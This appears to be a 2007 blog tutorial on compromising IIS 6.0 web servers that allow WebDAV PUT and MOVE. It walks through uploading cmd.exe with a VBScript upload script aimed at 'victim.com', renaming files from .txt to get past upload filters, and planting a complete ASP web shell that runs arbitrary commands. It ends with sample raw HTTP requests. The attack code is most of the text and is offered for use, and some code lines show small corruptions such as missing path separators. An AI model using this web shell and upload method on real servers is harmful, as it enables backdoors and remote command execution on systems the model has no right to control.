Owning IIS 6.0 When Webserver Supports Put and Move HTTP Methods

June 14, 2007

Credits: ice  and ferruh

In IIS 6.0 you can upload the backdoor scripts but u may not be able to execute the default cmd.exe present in the iis box, so u need to upload your own cmd.exe first and then make your asp backdoor point to the cmd.exe which you uploaded.

Steps:

1. Upload cmd.exe to /scripts/ folder: Use the script below published by http://www.eggheadcafe.com/articles/20010829.asp which will allow you to upload cmd.exe (or any other binary) to the vulnerable server. You may not be able to upload a .exe file, so rename cmd.exe to  cmd.txt and then use the move method to copy it back from cmd.txt to cmd.exe. Note that cmd.exe must be copied to the /scripts/ folder of IIS where you have by default execute privileges.

Here is the upload script: 

<script language=VBSCRIPT> dim strURL function sendit( sfileName, sType) sData = getFileBytes(sfileName, sType) sfileName= mid(sfileName, InstrRev(sFileName,"")+1,len(sfileName)) dim xmlhttp set xmlhttp=createobject("MSXML2.XMLHTTP.3.0")
strURL = "http://victim.com/scripts/" & sFileName msgbox "URL is: " & strURL xmlhttp.Open "PUT", strURL, false xmlhttp.Send sData show.innerText= "Status: " & xmlhttp.statusText set xmlhttp=Nothing End function
sub showresult()
document.write "<CENTER>Take A look!<BR><A xhref=" & strURL & ">"& strURL & "</a></CENTER>"
end sub

function getFileBytes(flnm, sType)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
if sType="on" then
objStream.Type = 1 ' adTypeBinary
else
objStream.Type = 2 ' adTypeText
objStream.Charset ="ascii"
end if
objStream.Open
objStream.LoadFromFile flnm
if sType="on" then
getFileBytes=objStream.Read
else
getFileBytes= objStream.ReadText
end if
objStream.Close
Set objStream = Nothing
end function
</script>

<TABLE align=center>
<TR><TD><input type=FILE id=filedata ></TD></TR>
<TR><TD><input type=submit onclick="Call sendit( filedata.value, filetype.value)"></TD></TR>
<TR><TD><input type=checkBox id=filetype checked >Type Binary (Uncheck for Type Text)</TD></TR>
<TR><TD><input type=button value = "SHOW IT" onclick ="showresult()"></TD></TR>
</TABLE>
<div id=show align=center></div>

2.Upload the cmd.asp file to /scripts/ folder: Use the same upload script running locally on your system to upload the cmd.asp, from (http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html)  

<!– IIS6 VBscript command shell –>

<!– aramosf@unsec.net http://www.514.es –>

<title>514 aspshell</title> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="cmd" size=45 value="<%= cmd %>">
<input type=submit value="Run">
</FORM>
<%
If (request("cmd") <> "") Then
Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)
End If
%>

You need to make the script point to the cmd.exe you uploaded in the scripts folder. You will need the absolute path, so the line:

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)

may look something like: 

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec("C:InetpubScriptsmycmd.exe /c " &

request("cmd")).stdout.readall)

You may not be able to upload the .asp file, so rename it as .txt and use the move method to copy it again as .asp on the server. That's it, job done, your backdoor should work fine now 🙂

– Questions:———————-

1. How to obtain the absolute path. add this line to your backdoor:

<%=Server.Mappath("/scripts/")%> 

This will give you the full path, make necessary changes to your backdoor and upload it again.

————————–

2. What if the scripts directory is not present?

I think the attack will fail as you wont have the execute permissions:

—————————

3. Is it a good practice to not have /scripts/ folder in the document root?

Think so.

———————–
'''Syntax:'''
———————-
 Example- PUT Method:

>>Request 

PUT /foo.txt HTTP/1.1

Host: www.victim.com

Content-Length: 4

test

>>Response 

HTTP/1.1 201 Created
Date: Thu, 14 Jun 2007 09:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.victim.com/foo.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
   

————————

Example – DELETE

>>Request   

DELETE  /container/ HTTP/1.1   

Host: www.foo.bar

>>Response   

HTTP/1.1 207 Multi-Status    Content-Type: text/xml; charset="utf-8"    Content-Length: xxxx    <?xml version="1.0" encoding="utf-8" ?>    <d:multistatus xmlns:d="DAV:">      <d:response>           <d:href>http://www.foo.bar/container/resource3</d:href>           <d:status>HTTP/1.1 423 Locked</d:status>      </d:response>    </d:multistatus>

————-

Example- MOVE
>>Request

   MOVE /~fielding/index.html HTTP/1.1
   Host: www.ics.uci.edu
   Destination: http://www.ics.uci.edu/users/f/fielding/index.html

>>Response

   HTTP/1.1 201 Created
   Location: http://www.ics.uci.edu/users/f/fielding/index.html

————

More HTTP methods:http://www.webdav.org/specs/rfc2518.html
————

Comments

1 Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback